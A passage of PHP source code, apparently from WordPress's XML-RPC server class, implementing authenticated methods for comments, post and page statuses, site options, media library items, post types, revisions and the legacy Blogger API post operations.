$comment['comment_author_email'] = '';
if ( isset( $content_struct['author_email'] ) ) {
$comment['comment_author_email'] = $content_struct['author_email'];
}
$comment['comment_author_url'] = '';
if ( isset( $content_struct['author_url'] ) ) {
$comment['comment_author_url'] = $content_struct['author_url'];
}
$comment['user_id'] = 0;
if ( get_option( 'require_name_email' ) ) {
if ( strlen( $comment['comment_author_email'] ) < 6 || '' === $comment['comment_author'] ) {
return new IXR_Error( 403, __( 'Comment author name and email are required.' ) );
} elseif ( ! is_email( $comment['comment_author_email'] ) ) {
return new IXR_Error( 403, __( 'A valid email address is required.' ) );
}
}
}
$comment['comment_parent'] = isset( $content_struct['comment_parent'] ) ? absint( $content_struct['comment_parent'] ) : 0;
/** This filter is documented in wp-includes/comment.php */
$allow_empty = apply_filters( 'allow_empty_comment', false, $comment );
if ( ! $allow_empty && '' === $comment['comment_content'] ) {
return new IXR_Error( 403, __( 'Comment is required.' ) );
}
/** This action is documented in wp-includes/class-wp-xmlrpc-server.php */
do_action( 'xmlrpc_call', 'wp.newComment', $args, $this );
$comment_id = wp_new_comment( $comment, true );
if ( is_wp_error( $comment_id ) ) {
return new IXR_Error( 403, $comment_id->get_error_message() );
}
if ( ! $comment_id ) {
return new IXR_Error( 403, __( 'An error occurred while processing your comment. Please ensure all fields are filled correctly and try again.' ) );
}
/**
* Fires after a new comment has been successfully created via XML-RPC.
*
* @since 3.4.0
*
* @param int $comment_id ID of the new comment.
* @param array $args An array of new comment arguments.
*/
do_action( 'xmlrpc_call_success_wp_newComment', $comment_id, $args ); // phpcs:ignore WordPress.NamingConventions.ValidHookName.NotLowercase
return $comment_id;
}
/**
* Retrieves all of the comment status.
*
* @since 2.7.0
*
* @param array $args {
* Method arguments. Note: arguments must be ordered as documented.
*
* @type int $0 Blog ID (unused).
* @type string $1 Username.
* @type string $2 Password.
* }
* @return array|IXR_Error
*/
public function wp_getCommentStatusList( $args ) {
$this->escape( $args );
$username = $args[1];
$password = $args[2];
$user = $this->login( $username, $password );
if ( ! $user ) {
return $this->error;
}
if ( ! current_user_can( 'publish_posts' ) ) {
return new IXR_Error( 403, __( 'Sorry, you are not allowed to access details about this site.' ) );
}
/** This action is documented in wp-includes/class-wp-xmlrpc-server.php */
do_action( 'xmlrpc_call', 'wp.getCommentStatusList', $args, $this );
return get_comment_statuses();
}
/**
* Retrieves comment counts.
*
* @since 2.5.0
*
* @param array $args {
* Method arguments. Note: arguments must be ordered as documented.
*
* @type int $0 Blog ID (unused).
* @type string $1 Username.
* @type string $2 Password.
* @type int $3 Post ID.
* }
* @return array|IXR_Error
*/
public function wp_getCommentCount( $args ) {
$this->escape( $args );
$username = $args[1];
$password = $args[2];
$post_id = (int) $args[3];
$user = $this->login( $username, $password );
if ( ! $user ) {
return $this->error;
}
$post = get_post( $post_id, ARRAY_A );
if ( empty( $post['ID'] ) ) {
return new IXR_Error( 404, __( 'Invalid post ID.' ) );
}
if ( ! current_user_can( 'edit_post', $post_id ) ) {
return new IXR_Error( 403, __( 'Sorry, you are not allowed to access details of this post.' ) );
}
/** This action is documented in wp-includes/class-wp-xmlrpc-server.php */
do_action( 'xmlrpc_call', 'wp.getCommentCount', $args, $this );
$count = wp_count_comments( $post_id );
return array(
'approved' => $count->approved,
'awaiting_moderation' => $count->moderated,
'spam' => $count->spam,
'total_comments' => $count->total_comments,
);
}
/**
* Retrieves post statuses.
*
* @since 2.5.0
*
* @param array $args {
* Method arguments. Note: arguments must be ordered as documented.
*
* @type int $0 Blog ID (unused).
* @type string $1 Username.
* @type string $2 Password.
* }
* @return array|IXR_Error
*/
public function wp_getPostStatusList( $args ) {
$this->escape( $args );
$username = $args[1];
$password = $args[2];
$user = $this->login( $username, $password );
if ( ! $user ) {
return $this->error;
}
if ( ! current_user_can( 'edit_posts' ) ) {
return new IXR_Error( 403, __( 'Sorry, you are not allowed to access details about this site.' ) );
}
/** This action is documented in wp-includes/class-wp-xmlrpc-server.php */
do_action( 'xmlrpc_call', 'wp.getPostStatusList', $args, $this );
return get_post_statuses();
}
/**
* Retrieves page statuses.
*
* @since 2.5.0
*
* @param array $args {
* Method arguments. Note: arguments must be ordered as documented.
*
* @type int $0 Blog ID (unused).
* @type string $1 Username.
* @type string $2 Password.
* }
* @return array|IXR_Error
*/
public function wp_getPageStatusList( $args ) {
$this->escape( $args );
$username = $args[1];
$password = $args[2];
$user = $this->login( $username, $password );
if ( ! $user ) {
return $this->error;
}
if ( ! current_user_can( 'edit_pages' ) ) {
return new IXR_Error( 403, __( 'Sorry, you are not allowed to access details about this site.' ) );
}
/** This action is documented in wp-includes/class-wp-xmlrpc-server.php */
do_action( 'xmlrpc_call', 'wp.getPageStatusList', $args, $this );
return get_page_statuses();
}
/**
* Retrieves page templates.
*
* @since 2.6.0
*
* @param array $args {
* Method arguments. Note: arguments must be ordered as documented.
*
* @type int $0 Blog ID (unused).
* @type string $1 Username.
* @type string $2 Password.
* }
* @return array|IXR_Error
*/
public function wp_getPageTemplates( $args ) {
$this->escape( $args );
$username = $args[1];
$password = $args[2];
$user = $this->login( $username, $password );
if ( ! $user ) {
return $this->error;
}
if ( ! current_user_can( 'edit_pages' ) ) {
return new IXR_Error( 403, __( 'Sorry, you are not allowed to access details about this site.' ) );
}
$templates = get_page_templates();
$templates['Default'] = 'default';
return $templates;
}
/**
* Retrieves blog options.
*
* @since 2.6.0
*
* @param array $args {
* Method arguments. Note: arguments must be ordered as documented.
*
* @type int $0 Blog ID (unused).
* @type string $1 Username.
* @type string $2 Password.
* @type array $3 Optional. Options.
* }
* @return array|IXR_Error
*/
public function wp_getOptions( $args ) {
$this->escape( $args );
$username = $args[1];
$password = $args[2];
$options = isset( $args[3] ) ? (array) $args[3] : array();
$user = $this->login( $username, $password );
if ( ! $user ) {
return $this->error;
}
// If no specific options where asked for, return all of them.
if ( count( $options ) === 0 ) {
$options = array_keys( $this->blog_options );
}
return $this->_getOptions( $options );
}
/**
* Retrieves blog options value from list.
*
* @since 2.6.0
*
* @param array $options Options to retrieve.
* @return array
*/
public function _getOptions( $options ) {
$data = array();
$can_manage = current_user_can( 'manage_options' );
foreach ( $options as $option ) {
if ( array_key_exists( $option, $this->blog_options ) ) {
$data[ $option ] = $this->blog_options[ $option ];
// Is the value static or dynamic?
if ( isset( $data[ $option ]['option'] ) ) {
$data[ $option ]['value'] = get_option( $data[ $option ]['option'] );
unset( $data[ $option ]['option'] );
}
if ( ! $can_manage ) {
$data[ $option ]['readonly'] = true;
}
}
}
return $data;
}
/**
* Updates blog options.
*
* @since 2.6.0
*
* @param array $args {
* Method arguments. Note: arguments must be ordered as documented.
*
* @type int $0 Blog ID (unused).
* @type string $1 Username.
* @type string $2 Password.
* @type array $3 Options.
* }
* @return array|IXR_Error
*/
public function wp_setOptions( $args ) {
$this->escape( $args );
$username = $args[1];
$password = $args[2];
$options = (array) $args[3];
$user = $this->login( $username, $password );
if ( ! $user ) {
return $this->error;
}
if ( ! current_user_can( 'manage_options' ) ) {
return new IXR_Error( 403, __( 'Sorry, you are not allowed to update options.' ) );
}
$option_names = array();
foreach ( $options as $o_name => $o_value ) {
$option_names[] = $o_name;
if ( ! array_key_exists( $o_name, $this->blog_options ) ) {
continue;
}
if ( $this->blog_options[ $o_name ]['readonly'] ) {
continue;
}
update_option( $this->blog_options[ $o_name ]['option'], wp_unslash( $o_value ) );
}
// Now return the updated values.
return $this->_getOptions( $option_names );
}
/**
* Retrieves a media item by ID.
*
* @since 3.1.0
*
* @param array $args {
* Method arguments. Note: arguments must be ordered as documented.
*
* @type int $0 Blog ID (unused).
* @type string $1 Username.
* @type string $2 Password.
* @type int $3 Attachment ID.
* }
* @return array|IXR_Error Associative array contains:
* - 'date_created_gmt'
* - 'parent'
* - 'link'
* - 'thumbnail'
* - 'title'
* - 'caption'
* - 'description'
* - 'metadata'
*/
public function wp_getMediaItem( $args ) {
$this->escape( $args );
$username = $args[1];
$password = $args[2];
$attachment_id = (int) $args[3];
$user = $this->login( $username, $password );
if ( ! $user ) {
return $this->error;
}
if ( ! current_user_can( 'upload_files' ) ) {
return new IXR_Error( 403, __( 'Sorry, you are not allowed to upload files.' ) );
}
/** This action is documented in wp-includes/class-wp-xmlrpc-server.php */
do_action( 'xmlrpc_call', 'wp.getMediaItem', $args, $this );
$attachment = get_post( $attachment_id );
if ( ! $attachment || 'attachment' !== $attachment->post_type ) {
return new IXR_Error( 404, __( 'Invalid attachment ID.' ) );
}
return $this->_prepare_media_item( $attachment );
}
/**
* Retrieves a collection of media library items (or attachments).
*
* Besides the common blog_id (unused), username, and password arguments,
* it takes a filter array as the last argument.
*
* Accepted 'filter' keys are 'parent_id', 'mime_type', 'offset', and 'number'.
*
* The defaults are as follows:
* - 'number' - Default is 5. Total number of media items to retrieve.
* - 'offset' - Default is 0. See WP_Query::query() for more.
* - 'parent_id' - Default is ''. The post where the media item is attached.
* Empty string shows all media items. 0 shows unattached media items.
* - 'mime_type' - Default is ''. Filter by mime type (e.g., 'image/jpeg', 'application/pdf')
*
* @since 3.1.0
*
* @param array $args {
* Method arguments. Note: arguments must be ordered as documented.
*
* @type int $0 Blog ID (unused).
* @type string $1 Username.
* @type string $2 Password.
* @type array $3 Optional. Query arguments.
* }
* @return array|IXR_Error Array containing a collection of media items.
* See wp_xmlrpc_server::wp_getMediaItem() for a description
* of each item contents.
*/
public function wp_getMediaLibrary( $args ) {
$this->escape( $args );
$username = $args[1];
$password = $args[2];
$struct = isset( $args[3] ) ? $args[3] : array();
$user = $this->login( $username, $password );
if ( ! $user ) {
return $this->error;
}
if ( ! current_user_can( 'upload_files' ) ) {
return new IXR_Error( 401, __( 'Sorry, you are not allowed to upload files.' ) );
}
/** This action is documented in wp-includes/class-wp-xmlrpc-server.php */
do_action( 'xmlrpc_call', 'wp.getMediaLibrary', $args, $this );
$parent_id = ( isset( $struct['parent_id'] ) ) ? absint( $struct['parent_id'] ) : '';
$mime_type = ( isset( $struct['mime_type'] ) ) ? $struct['mime_type'] : '';
$offset = ( isset( $struct['offset'] ) ) ? absint( $struct['offset'] ) : 0;
$number = ( isset( $struct['number'] ) ) ? absint( $struct['number'] ) : -1;
$attachments = get_posts(
array(
'post_type' => 'attachment',
'post_parent' => $parent_id,
'offset' => $offset,
'numberposts' => $number,
'post_mime_type' => $mime_type,
)
);
$attachments_struct = array();
foreach ( $attachments as $attachment ) {
$attachments_struct[] = $this->_prepare_media_item( $attachment );
}
return $attachments_struct;
}
/**
* Retrieves a list of post formats used by the site.
*
* @since 3.1.0
*
* @param array $args {
* Method arguments. Note: arguments must be ordered as documented.
*
* @type int $0 Blog ID (unused).
* @type string $1 Username.
* @type string $2 Password.
* }
* @return array|IXR_Error List of post formats, otherwise IXR_Error object.
*/
public function wp_getPostFormats( $args ) {
$this->escape( $args );
$username = $args[1];
$password = $args[2];
$user = $this->login( $username, $password );
if ( ! $user ) {
return $this->error;
}
if ( ! current_user_can( 'edit_posts' ) ) {
return new IXR_Error( 403, __( 'Sorry, you are not allowed to access details about this site.' ) );
}
/** This action is documented in wp-includes/class-wp-xmlrpc-server.php */
do_action( 'xmlrpc_call', 'wp.getPostFormats', $args, $this );
$formats = get_post_format_strings();
// Find out if they want a list of currently supports formats.
if ( isset( $args[3] ) && is_array( $args[3] ) ) {
if ( $args[3]['show-supported'] ) {
if ( current_theme_supports( 'post-formats' ) ) {
$supported = get_theme_support( 'post-formats' );
$data = array();
$data['all'] = $formats;
$data['supported'] = $supported[0];
$formats = $data;
}
}
}
return $formats;
}
/**
* Retrieves a post type.
*
* @since 3.4.0
*
* @see get_post_type_object()
*
* @param array $args {
* Method arguments. Note: arguments must be ordered as documented.
*
* @type int $0 Blog ID (unused).
* @type string $1 Username.
* @type string $2 Password.
* @type string $3 Post type name.
* @type array $4 Optional. Fields to fetch.
* }
* @return array|IXR_Error Array contains:
* - 'labels'
* - 'description'
* - 'capability_type'
* - 'cap'
* - 'map_meta_cap'
* - 'hierarchical'
* - 'menu_position'
* - 'taxonomies'
* - 'supports'
*/
public function wp_getPostType( $args ) {
if ( ! $this->minimum_args( $args, 4 ) ) {
return $this->error;
}
$this->escape( $args );
$username = $args[1];
$password = $args[2];
$post_type_name = $args[3];
if ( isset( $args[4] ) ) {
$fields = $args[4];
} else {
/**
* Filters the default post type query fields used by the given XML-RPC method.
*
* @since 3.4.0
*
* @param array $fields An array of post type fields to retrieve. By default,
* contains 'labels', 'cap', and 'taxonomies'.
* @param string $method The method name.
*/
$fields = apply_filters( 'xmlrpc_default_posttype_fields', array( 'labels', 'cap', 'taxonomies' ), 'wp.getPostType' );
}
$user = $this->login( $username, $password );
if ( ! $user ) {
return $this->error;
}
/** This action is documented in wp-includes/class-wp-xmlrpc-server.php */
do_action( 'xmlrpc_call', 'wp.getPostType', $args, $this );
if ( ! post_type_exists( $post_type_name ) ) {
return new IXR_Error( 403, __( 'Invalid post type.' ) );
}
$post_type = get_post_type_object( $post_type_name );
if ( ! current_user_can( $post_type->cap->edit_posts ) ) {
return new IXR_Error( 401, __( 'Sorry, you are not allowed to edit posts in this post type.' ) );
}
return $this->_prepare_post_type( $post_type, $fields );
}
/**
* Retrieves post types.
*
* @since 3.4.0
*
* @see get_post_types()
*
* @param array $args {
* Method arguments. Note: arguments must be ordered as documented.
*
* @type int $0 Blog ID (unused).
* @type string $1 Username.
* @type string $2 Password.
* @type array $3 Optional. Query arguments.
* @type array $4 Optional. Fields to fetch.
* }
* @return array|IXR_Error
*/
public function wp_getPostTypes( $args ) {
if ( ! $this->minimum_args( $args, 3 ) ) {
return $this->error;
}
$this->escape( $args );
$username = $args[1];
$password = $args[2];
$filter = isset( $args[3] ) ? $args[3] : array( 'public' => true );
if ( isset( $args[4] ) ) {
$fields = $args[4];
} else {
/** This action is documented in wp-includes/class-wp-xmlrpc-server.php */
$fields = apply_filters( 'xmlrpc_default_posttype_fields', array( 'labels', 'cap', 'taxonomies' ), 'wp.getPostTypes' );
}
$user = $this->login( $username, $password );
if ( ! $user ) {
return $this->error;
}
/** This action is documented in wp-includes/class-wp-xmlrpc-server.php */
do_action( 'xmlrpc_call', 'wp.getPostTypes', $args, $this );
$post_types = get_post_types( $filter, 'objects' );
$struct = array();
foreach ( $post_types as $post_type ) {
if ( ! current_user_can( $post_type->cap->edit_posts ) ) {
continue;
}
$struct[ $post_type->name ] = $this->_prepare_post_type( $post_type, $fields );
}
return $struct;
}
/**
* Retrieves revisions for a specific post.
*
* @since 3.5.0
*
* The optional $fields parameter specifies what fields will be included
* in the response array.
*
* @uses wp_get_post_revisions()
* @see wp_getPost() for more on $fields
*
* @param array $args {
* Method arguments. Note: arguments must be ordered as documented.
*
* @type int $0 Blog ID (unused).
* @type string $1 Username.
* @type string $2 Password.
* @type int $3 Post ID.
* @type array $4 Optional. Fields to fetch.
* }
* @return array|IXR_Error Array containing a collection of posts.
*/
public function wp_getRevisions( $args ) {
if ( ! $this->minimum_args( $args, 4 ) ) {
return $this->error;
}
$this->escape( $args );
$username = $args[1];
$password = $args[2];
$post_id = (int) $args[3];
if ( isset( $args[4] ) ) {
$fields = $args[4];
} else {
/**
* Filters the default revision query fields used by the given XML-RPC method.
*
* @since 3.5.0
*
* @param array $field An array of revision fields to retrieve. By default,
* contains 'post_date' and 'post_date_gmt'.
* @param string $method The method name.
*/
$fields = apply_filters( 'xmlrpc_default_revision_fields', array( 'post_date', 'post_date_gmt' ), 'wp.getRevisions' );
}
$user = $this->login( $username, $password );
if ( ! $user ) {
return $this->error;
}
/** This action is documented in wp-includes/class-wp-xmlrpc-server.php */
do_action( 'xmlrpc_call', 'wp.getRevisions', $args, $this );
$post = get_post( $post_id );
if ( ! $post ) {
return new IXR_Error( 404, __( 'Invalid post ID.' ) );
}
if ( ! current_user_can( 'edit_post', $post_id ) ) {
return new IXR_Error( 401, __( 'Sorry, you are not allowed to edit posts.' ) );
}
// Check if revisions are enabled.
if ( ! wp_revisions_enabled( $post ) ) {
return new IXR_Error( 401, __( 'Sorry, revisions are disabled.' ) );
}
$revisions = wp_get_post_revisions( $post_id );
if ( ! $revisions ) {
return array();
}
$struct = array();
foreach ( $revisions as $revision ) {
if ( ! current_user_can( 'read_post', $revision->ID ) ) {
continue;
}
// Skip autosaves.
if ( wp_is_post_autosave( $revision ) ) {
continue;
}
$struct[] = $this->_prepare_post( get_object_vars( $revision ), $fields );
}
return $struct;
}
/**
* Restores a post revision.
*
* @since 3.5.0
*
* @uses wp_restore_post_revision()
*
* @param array $args {
* Method arguments. Note: arguments must be ordered as documented.
*
* @type int $0 Blog ID (unused).
* @type string $1 Username.
* @type string $2 Password.
* @type int $3 Revision ID.
* }
* @return bool|IXR_Error false if there was an error restoring, true if success.
*/
public function wp_restoreRevision( $args ) {
if ( ! $this->minimum_args( $args, 3 ) ) {
return $this->error;
}
$this->escape( $args );
$username = $args[1];
$password = $args[2];
$revision_id = (int) $args[3];
$user = $this->login( $username, $password );
if ( ! $user ) {
return $this->error;
}
/** This action is documented in wp-includes/class-wp-xmlrpc-server.php */
do_action( 'xmlrpc_call', 'wp.restoreRevision', $args, $this );
$revision = wp_get_post_revision( $revision_id );
if ( ! $revision ) {
return new IXR_Error( 404, __( 'Invalid post ID.' ) );
}
if ( wp_is_post_autosave( $revision ) ) {
return new IXR_Error( 404, __( 'Invalid post ID.' ) );
}
$post = get_post( $revision->post_parent );
if ( ! $post ) {
return new IXR_Error( 404, __( 'Invalid post ID.' ) );
}
if ( ! current_user_can( 'edit_post', $revision->post_parent ) ) {
return new IXR_Error( 401, __( 'Sorry, you are not allowed to edit this post.' ) );
}
// Check if revisions are disabled.
if ( ! wp_revisions_enabled( $post ) ) {
return new IXR_Error( 401, __( 'Sorry, revisions are disabled.' ) );
}
$post = wp_restore_post_revision( $revision_id );
return (bool) $post;
}
/*
* Blogger API functions.
* Specs on http://plant.blogger.com/api and https://groups.yahoo.com/group/bloggerDev/
*/
/**
* Retrieves blogs that user owns.
*
* Will make more sense once we support multiple blogs.
*
* @since 1.5.0
*
* @param array $args {
* Method arguments. Note: arguments must be ordered as documented.
*
* @type int $0 Blog ID (unused).
* @type string $1 Username.
* @type string $2 Password.
* }
* @return array|IXR_Error
*/
public function blogger_getUsersBlogs( $args ) {
if ( ! $this->minimum_args( $args, 3 ) ) {
return $this->error;
}
if ( is_multisite() ) {
return $this->_multisite_getUsersBlogs( $args );
}
$this->escape( $args );
$username = $args[1];
$password = $args[2];
$user = $this->login( $username, $password );
if ( ! $user ) {
return $this->error;
}
/** This action is documented in wp-includes/class-wp-xmlrpc-server.php */
do_action( 'xmlrpc_call', 'blogger.getUsersBlogs', $args, $this );
$is_admin = current_user_can( 'manage_options' );
$struct = array(
'isAdmin' => $is_admin,
'url' => get_option( 'home' ) . '/',
'blogid' => '1',
'blogName' => get_option( 'blogname' ),
'xmlrpc' => site_url( 'xmlrpc.php', 'rpc' ),
);
return array( $struct );
}
/**
* Private function for retrieving a users blogs for multisite setups.
*
* @since 3.0.0
*
* @param array $args {
* Method arguments. Note: arguments must be ordered as documented.
*
* @type int $0 Blog ID (unused).
* @type string $1 Username.
* @type string $2 Password.
* }
* @return array|IXR_Error
*/
protected function _multisite_getUsersBlogs( $args ) {
$current_blog = get_site();
$domain = $current_blog->domain;
$path = $current_blog->path . 'xmlrpc.php';
$blogs = $this->wp_getUsersBlogs( $args );
if ( $blogs instanceof IXR_Error ) {
return $blogs;
}
if ( $_SERVER['HTTP_HOST'] === $domain && $_SERVER['REQUEST_URI'] === $path ) {
return $blogs;
} else {
foreach ( (array) $blogs as $blog ) {
if ( str_contains( $blog['url'], $_SERVER['HTTP_HOST'] ) ) {
return array( $blog );
}
}
return array();
}
}
/**
* Retrieves user's data.
*
* Gives your client some info about you, so you don't have to.
*
* @since 1.5.0
*
* @param array $args {
* Method arguments. Note: arguments must be ordered as documented.
*
* @type int $0 Blog ID (unused).
* @type string $1 Username.
* @type string $2 Password.
* }
* @return array|IXR_Error
*/
public function blogger_getUserInfo( $args ) {
$this->escape( $args );
$username = $args[1];
$password = $args[2];
$user = $this->login( $username, $password );
if ( ! $user ) {
return $this->error;
}
if ( ! current_user_can( 'edit_posts' ) ) {
return new IXR_Error( 401, __( 'Sorry, you are not allowed to access user data on this site.' ) );
}
/** This action is documented in wp-includes/class-wp-xmlrpc-server.php */
do_action( 'xmlrpc_call', 'blogger.getUserInfo', $args, $this );
$struct = array(
'nickname' => $user->nickname,
'userid' => $user->ID,
'url' => $user->user_url,
'lastname' => $user->last_name,
'firstname' => $user->first_name,
);
return $struct;
}
/**
* Retrieves a post.
*
* @since 1.5.0
*
* @param array $args {
* Method arguments. Note: arguments must be ordered as documented.
*
* @type int $0 Blog ID (unused).
* @type int $1 Post ID.
* @type string $2 Username.
* @type string $3 Password.
* }
* @return array|IXR_Error
*/
public function blogger_getPost( $args ) {
$this->escape( $args );
$post_id = (int) $args[1];
$username = $args[2];
$password = $args[3];
$user = $this->login( $username, $password );
if ( ! $user ) {
return $this->error;
}
$post_data = get_post( $post_id, ARRAY_A );
if ( ! $post_data ) {
return new IXR_Error( 404, __( 'Invalid post ID.' ) );
}
if ( ! current_user_can( 'edit_post', $post_id ) ) {
return new IXR_Error( 401, __( 'Sorry, you are not allowed to edit this post.' ) );
}
/** This action is documented in wp-includes/class-wp-xmlrpc-server.php */
do_action( 'xmlrpc_call', 'blogger.getPost', $args, $this );
$categories = implode( ',', wp_get_post_categories( $post_id ) );
$content = '<title>' . wp_unslash( $post_data['post_title'] ) . '</title>';
$content .= '<category>' . $categories . '</category>';
$content .= wp_unslash( $post_data['post_content'] );
$struct = array(
'userid' => $post_data['post_author'],
'dateCreated' => $this->_convert_date( $post_data['post_date'] ),
'content' => $content,
'postid' => (string) $post_data['ID'],
);
return $struct;
}
/**
* Retrieves the list of recent posts.
*
* @since 1.5.0
*
* @param array $args {
* Method arguments. Note: arguments must be ordered as documented.
*
* @type string $0 App key (unused).
* @type int $1 Blog ID (unused).
* @type string $2 Username.
* @type string $3 Password.
* @type int $4 Optional. Number of posts.
* }
* @return array|IXR_Error
*/
public function blogger_getRecentPosts( $args ) {
$this->escape( $args );
// $args[0] = appkey - ignored.
$username = $args[2];
$password = $args[3];
if ( isset( $args[4] ) ) {
$query = array( 'numberposts' => absint( $args[4] ) );
} else {
$query = array();
}
$user = $this->login( $username, $password );
if ( ! $user ) {
return $this->error;
}
if ( ! current_user_can( 'edit_posts' ) ) {
return new IXR_Error( 401, __( 'Sorry, you are not allowed to edit posts.' ) );
}
/** This action is documented in wp-includes/class-wp-xmlrpc-server.php */
do_action( 'xmlrpc_call', 'blogger.getRecentPosts', $args, $this );
$posts_list = wp_get_recent_posts( $query );
if ( ! $posts_list ) {
$this->error = new IXR_Error( 500, __( 'No posts found or an error occurred while retrieving posts.' ) );
return $this->error;
}
$recent_posts = array();
foreach ( $posts_list as $entry ) {
if ( ! current_user_can( 'edit_post', $entry['ID'] ) ) {
continue;
}
$post_date = $this->_convert_date( $entry['post_date'] );
$categories = implode( ',', wp_get_post_categories( $entry['ID'] ) );
$content = '<title>' . wp_unslash( $entry['post_title'] ) . '</title>';
$content .= '<category>' . $categories . '</category>';
$content .= wp_unslash( $entry['post_content'] );
$recent_posts[] = array(
'userid' => $entry['post_author'],
'dateCreated' => $post_date,
'content' => $content,
'postid' => (string) $entry['ID'],
);
}
return $recent_posts;
}
/**
* Deprecated.
*
* @since 1.5.0
* @deprecated 3.5.0
*
* @param array $args Unused.
* @return IXR_Error Error object.
*/
public function blogger_getTemplate( $args ) {
return new IXR_Error( 403, __( 'Sorry, this method is not supported.' ) );
}
/**
* Deprecated.
*
* @since 1.5.0
* @deprecated 3.5.0
*
* @param array $args Unused.
* @return IXR_Error Error object.
*/
public function blogger_setTemplate( $args ) {
return new IXR_Error( 403, __( 'Sorry, this method is not supported.' ) );
}
/**
* Creates a new post.
*
* @since 1.5.0
*
* @param array $args {
* Method arguments. Note: arguments must be ordered as documented.
*
* @type string $0 App key (unused).
* @type int $1 Blog ID (unused).
* @type string $2 Username.
* @type string $3 Password.
* @type string $4 Content.
* @type int $5 Publish flag. 0 for draft, 1 for publish.
* }
* @return int|IXR_Error
*/
public function blogger_newPost( $args ) {
$this->escape( $args );
$username = $args[2];
$password = $args[3];
$content = $args[4];
$publish = $args[5];
$user = $this->login( $username, $password );
if ( ! $user ) {
return $this->error;
}
/** This action is documented in wp-includes/class-wp-xmlrpc-server.php */
do_action( 'xmlrpc_call', 'blogger.newPost', $args, $this );
$cap = ( $publish ) ? 'publish_posts' : 'edit_posts';
if ( ! current_user_can( get_post_type_object( 'post' )->cap->create_posts ) || ! current_user_can( $cap ) ) {
return new IXR_Error( 401, __( 'Sorry, you are not allowed to post on this site.' ) );
}
$post_status = ( $publish ) ? 'publish' : 'draft';
$post_author = $user->ID;
$post_title = xmlrpc_getposttitle( $content );
$post_category = xmlrpc_getpostcategory( $content );
$post_content = xmlrpc_removepostdata( $content );
$post_date = current_time( 'mysql' );
$post_date_gmt = current_time( 'mysql', true );
$post_data = compact(
'post_author',
'post_date',
'post_date_gmt',
'post_content',
'post_title',
'post_category',
'post_status'
);
$post_id = wp_insert_post( $post_data );
if ( is_wp_error( $post_id ) ) {
return new IXR_Error( 500, $post_id->get_error_message() );
}
if ( ! $post_id ) {
return new IXR_Error( 500, __( 'Sorry, the post could not be created.' ) );
}
$this->attach_uploads( $post_id, $post_content );
/**
* Fires after a new post has been successfully created via the XML-RPC Blogger API.
*
* @since 3.4.0
*
* @param int $post_id ID of the new post.
* @param array $args An array of new post arguments.
*/
do_action( 'xmlrpc_call_success_blogger_newPost', $post_id, $args ); // phpcs:ignore WordPress.NamingConventions.ValidHookName.NotLowercase
return $post_id;
}
/**
* Edits a post.
*
* @since 1.5.0
*
* @param array $args {
* Method arguments. Note: arguments must be ordered as documented.
*
* @type int $0 Blog ID (unused).
* @type int $1 Post ID.
* @type string $2 Username.
* @type string $3 Password.
* @type string $4 Content
* @type int $5 Publish flag. 0 for draft, 1 for publish.
* }
* @return true|IXR_Error true when done.
*/
public function blogger_editPost( $args ) {
$this->escape( $args );
$post_id = (int) $args[1];
$username = $args[2];
$password = $args[3];
$content = $args[4];
$publish = $args[5];
$user = $this->login( $username, $password );
if ( ! $user ) {
return $this->error;
}
/** This action is documented in wp-includes/class-wp-xmlrpc-server.php */
do_action( 'xmlrpc_call', 'blogger.editPost', $args, $this );
$actual_post = get_post( $post_id, ARRAY_A );
if ( ! $actual_post || 'post' !== $actual_post['post_type'] ) {
return new IXR_Error( 404, __( 'Sorry, no such post.' ) );
}
$this->escape( $actual_post );
if ( ! current_user_can( 'edit_post', $post_id ) ) {
return new IXR_Error( 401, __( 'Sorry, you are not allowed to edit this post.' ) );
}
if ( 'publish' === $actual_post['post_status'] && ! current_user_can( 'publish_posts' ) ) {
return new IXR_Error( 401, __( 'Sorry, you are not allowed to publish this post.' ) );
}
$postdata = array();
$postdata['ID'] = $actual_post['ID'];
$postdata['post_content'] = xmlrpc_removepostdata( $content );
$postdata['post_title'] = xmlrpc_getposttitle( $content );
$postdata['post_category'] = xmlrpc_getpostcategory( $content );
$postdata['post_status'] = $actual_post['post_status'];
$postdata['post_excerpt'] = $actual_post['post_excerpt'];
$postdata['post_status'] = $publish ? 'publish' : 'draft';
$result = wp_update_post( $postdata );
if ( ! $result ) {
return new IXR_Error( 500, __( 'Sorry, the post could not be updated.' ) );
}
$this->attach_uploads( $actual_post['ID'], $postdata['post_content'] );
/**
* Fires after a post has been successfully updated via the XML-RPC Blogger API.
*
* @since 3.4.0
*
* @param int $post_id ID of the updated post.
* @param array $args An array of arguments for the post to edit.
*/
do_action( 'xmlrpc_call_success_blogger_editPost', $post_id, $args ); // phpcs:ignore WordPress.NamingConventions.ValidHookName.NotLowercase
return true;
}
/**
* Deletes a post.
*
* @since 1.5.0
*
* @param array $args {
* Method arguments. Note: arguments must be ordered as documented.
*
* @type int $0 Blog ID (unused).
* @type int $1 Post ID.
* @type string $2 Username.
* @type string $3 Password.
* }
* @return true|IXR_Error True when post is deleted.
*/
public function blogger_deletePost( $args ) {
$this->escape( $args );
$post_id = (int) $args[1];
$username = $args[2];
$password = $args[3];
$user = $this->login( $username, $password );
if ( ! $user ) {
return $this->error;
}
/** This action is documented in wp-includes/class-wp-xmlrpc-server.php */
do_action( 'xmlrpc_call', 'blogger.deletePost', $args, $this );
$actual_post = get_post( $post_id, ARRAY_A );
if ( ! $actual_post || 'post' !== $actual_post['post_type'] ) {
return new IXR_Error( 404, __( 'Sorry, no such post.' ) );
}
if ( ! current_user_can( 'delete_post', $post_id ) ) {
return new IXR_Error( 401, __( 'Sorry, you are not allowed to delete this post.' ) );
}
$result = wp_delete_post( $post_id );
if ( ! $result ) {
return new IXR_Error( 500, __( 'Sorry, the post could not be deleted.' ) );
}
/**
* Fires after a post has been successfully deleted via the XML-RPC Blogger API.
*
* @since 3.4.0
*
* @param int $post_id ID of the deleted post.
* @param array $args An array of arguments to delete the post.
*/
do_action( 'xmlrpc_call_success_blogger_deletePost', $post_id, $args ); // phpcs:ignore WordPress.NamingConventions.ValidHookName.NotLowercase
return true;
}
/*
* MetaWeblog API functions.
* Specs on wherever Dave Winer wants them to be.
*/
/**
* Creates a new post.
*
* The 'content_struct' argument must contain:
* - title
* - description
* - mt_excerpt
* - mt_text_more
* - mt_keywords
* - mt_tb_ping_urls
* - categories
*
* Also, it can optionally contain:
* - wp_slug
* - wp_password
* - wp_page_parent_id
* - wp_page_order
* - wp_author_id
* - post_status | page_status - can be 'draft', 'private', 'publish', or 'pending'
* - mt_allow_comments - can be 'open' or 'closed'
* - mt_allow_pings - can be 'open' or 'closed'
* - date_created_gmt
* - dateCreated
* - wp_post_thumbnail
*
